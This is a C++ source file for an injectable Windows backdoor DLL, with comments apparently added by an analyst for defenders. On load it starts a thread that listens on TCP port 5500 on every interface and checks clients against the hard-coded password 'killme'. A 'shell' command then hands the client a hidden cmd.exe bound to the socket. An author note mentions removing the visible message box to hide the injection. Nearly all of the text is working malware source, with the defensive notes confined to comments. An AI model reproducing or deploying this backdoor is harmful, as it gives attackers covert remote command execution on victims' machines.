// MyFirstDoorDll.cpp : defines the entry point for the DLL application.
//beek 2006-11-07
//
// Analyst's summary (what the code below visibly does):
//   - On DLL_PROCESS_ATTACH a thread is started that binds TCP port 5500 on
//     every local interface (ADDR_ANY) and accepts connections one at a time.
//   - Each client is asked for a password; it is compared with the hard-coded
//     string "killme".
//   - The "shell" command launches cmd.exe with its stdin/stdout/stderr
//     redirected to the client's socket handle (a classic bind shell).
// Observable indicators for defenders: a process hosting this DLL that owns
// a LISTENING socket on port 5500, a cmd.exe child whose standard handles are
// socket handles, and the two MessageBox strings below.
#include "stdafx.h"
#include <winsock2.h>
//#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"ws2_32.lib")
#ifdef _MANAGED
#pragma managed(push, off)
#endif

// Help text sent back to the client in response to "?".
char cHelp[] = "? --help\r\nshell --open a cmd shell\r\nquit\t--quit shell\r\n";

// Spawns cmd.exe with its standard handles bound to clientSock and blocks
// until that process exits.
//   clientSock: connected socket whose handle is inherited by cmd.exe.
//   Returns 1 unconditionally; the CreateProcess result stored in ret is
//   never examined, so on failure ProcessInformation is used uninitialized.
int StartCmdShell(SOCKET clientSock)
{
    STARTUPINFO si;
    ZeroMemory(&si,sizeof(si));
    si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    // Hide the console window of the child process.
    si.wShowWindow = SW_HIDE;
    // Bind cmd's stdin/stdout/stderr to the socket handle.
    si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientSock;
    char cmdLine[] = "cmd.exe";
    PROCESS_INFORMATION ProcessInformation;
    int ret;
    // Create the child process; bInheritHandles is 1 so the socket handle is
    // passed through.
    ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
    WaitForSingleObject(ProcessInformation.hProcess, INFINITE);
    TerminateProcess(ProcessInformation.hProcess, 0);
    CloseHandle(ProcessInformation.hProcess);
    return 1;
}

// Thread entry point: listens on TCP 5500 and serves one client at a time.
//   lpParam: unused.
//   Returns 0, but the accept loop only exits via the goto/return paths
//   below; in practice the thread runs for the life of the host process.
// Note: bind/listen failures only show a message box; the thread continues
// into accept() regardless.
DWORD WINAPI DoorStart(LPVOID lpParam)
{
    WSADATA wsa;
    SOCKET listener;
    char buffer[1024],cmd[1024],psw[1024];
    int ret;
    unsigned long lBytesRead;
    struct sockaddr_in serverAddr;
    //struct sockaddr_in clientAddr;
    int iClientAddrLength;
    WSAStartup(MAKEWORD(2,2),&wsa);
    listener = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
    // [word censored in the original post] local port 5500: the socket is
    // bound to ADDR_ANY, i.e. reachable on every interface, not just localhost.
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_port = htons(5500);
    serverAddr.sin_addr.s_addr = ADDR_ANY;
    if((ret=bind(listener,(struct sockaddr *)&serverAddr,sizeof(serverAddr))) == SOCKET_ERROR)
    {
        MessageBox(NULL,"bind error","OK",MB_OK);
    }
    if((ret=listen(listener,2) )== SOCKET_ERROR)
    {
        MessageBox(NULL,"listen error","OK",MB_OK);
    }
    //iClientAddrLength = sizeof(clientAddr);
    iClientAddrLength = sizeof(serverAddr);
    // The peer address is written over serverAddr, which is no longer needed
    // after bind().
again:
    SOCKET clientSock = accept(listener,(sockaddr*)&serverAddr,&iClientAddrLength);
    send(clientSock,"Please Enter Your PassWord:",sizeof("Please Enter Your PassWord:"),0);
    // Clear the password buffer.
    ZeroMemory(psw,1024);
    lBytesRead = 0;
    // Read the password: one byte per recv(), blocking until exactly 256 bytes
    // have arrived (a return of 0 on disconnect is not treated as an error).
    while(lBytesRead <256)
    {
        if(recv(clientSock,buffer,1,0) == SOCKET_ERROR)
        {
            closesocket(clientSock);
            goto again;
        }
        psw[lBytesRead] = buffer[0];
        lBytesRead++;
    }
    // Hard-coded credential check; on success enter the command loop.
    if(strcmp(psw,"killme") ==0)
    {
        send(clientSock,"Welcome to Beek's First Shell!\n\rInput \"?\" for help!\n\r",sizeof("Welcome to Beek's First Shell!\n\rInput \"?\" for help!\n\r"),0);
        send(clientSock,"Command>",sizeof("Command>"),0);
        while(true)
        {
            ZeroMemory(cmd,1024);
            lBytesRead = 0;
            // Same 256-byte, byte-at-a-time read as for the password.
            while(lBytesRead<256)
            {
                if(recv(clientSock,buffer,1,0) == SOCKET_ERROR)
                {
                    closesocket(clientSock);
                    goto again;
                }
                cmd[lBytesRead] = buffer[0];
                lBytesRead++;
            }
            if(strcmp(cmd,"?")==0)
            {
                send(clientSock,cHelp,sizeof(cHelp),0);
            }
            if(strcmp(cmd,"shell")==0)
            {
                send(clientSock,"Create Shell OK.\n",sizeof("Create Shell OK.\n"),0);
                StartCmdShell(clientSock);
                //send(clientSock,"Exit Shell.\n",sizeof("Exit Shell.\n"),0);
            }
            if(strcmp(cmd,"quit")==0)
            {
                closesocket(clientSock);
                goto again;
            }
            if(strlen(cmd))
            {
                send(clientSock,"Command>",sizeof("Command>"),0);
            }
            Sleep(100);
        }
    }
    else
    {
        // Wrong password: drop the client and wait for the next one.
        closesocket(clientSock);
        goto again;
    }
    return 0;
}

// DLL entry point. On process attach it shows a message box and starts the
// listener thread. The DLL_PROCESS_ATTACH case has no break, so it falls
// through to default, which returns TRUE.
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    switch(ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        {
            // Author's note in the original: this message box was to be
            // commented out in a real build so the injection is not visible.
            // For defenders it is a useful string indicator when present.
            MessageBox(NULL,"Telnet localhost 5500 port for a shell.\nInstall finished,Restart Your Computer to remove it~","Inject DLL Success!",MB_OK);
            // Start the backdoor thread; DoorStart does the winsock work and
            // must have the thread-callback signature. Note that calling
            // CreateThread from DllMain runs under the loader lock.
            CreateThread(NULL,NULL,DoorStart,NULL,NULL,NULL);
        }
    default:
        return TRUE;
    }
    return TRUE;
}
#ifdef _MANAGED
#pragma managed(pop)
#endif